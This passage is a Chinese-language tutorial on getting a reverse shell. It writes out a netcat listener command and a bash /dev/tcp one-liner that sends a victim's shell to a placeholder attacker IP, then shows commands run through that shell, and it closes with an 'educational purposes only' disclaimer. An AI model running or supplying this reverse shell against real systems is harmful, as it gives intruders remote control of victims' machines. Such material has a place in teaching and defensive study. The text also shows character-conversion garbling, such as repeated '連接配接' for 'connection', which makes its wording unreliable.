- 在攻擊者的機器上設定監聽器:攻擊者在他們的機器上設定一個監聽器,用于接收來自受害者的反向 shell 連接配接。可以使用以下指令執行此操作:
nc -lvp 1234
這個指令告訴 netcat 在端口 1234 上監聽傳入的連接配接。
- 在受害者的機器上建立反向 shell:攻擊者使用 Bash 指令在受害者的機器上建立一個反向 shell。可以使用以下指令執行此操作:
bash -i >& /dev/tcp/<攻擊者IP>/1234 0>&1 這個指令使用 /dev/tcp 檔案系統将 Bash shell 發送到攻擊者的機器。 >& 運算符将 Bash shell 的标準輸出和标準錯誤重定向到網絡套接字。 0>&1 運算符将 Bash shell 的标準輸入重定向到相同的網絡套接字。
- 連接配接到反向 shell:一旦受害者的機器運作上述指令,它将嘗試在端口 1234 上連接配接到攻擊者的機器。當連接配接建立時,攻擊者将在他們的機器上收到一個 shell 提示符,可以使用它在受害者的機器上運作指令。
例如,攻擊者可以使用以下指令導航到受害者的主目錄并列出其内容:
cd ~
ls -la 請注意,上面的示例僅供教育目的,不應用于惡意目的。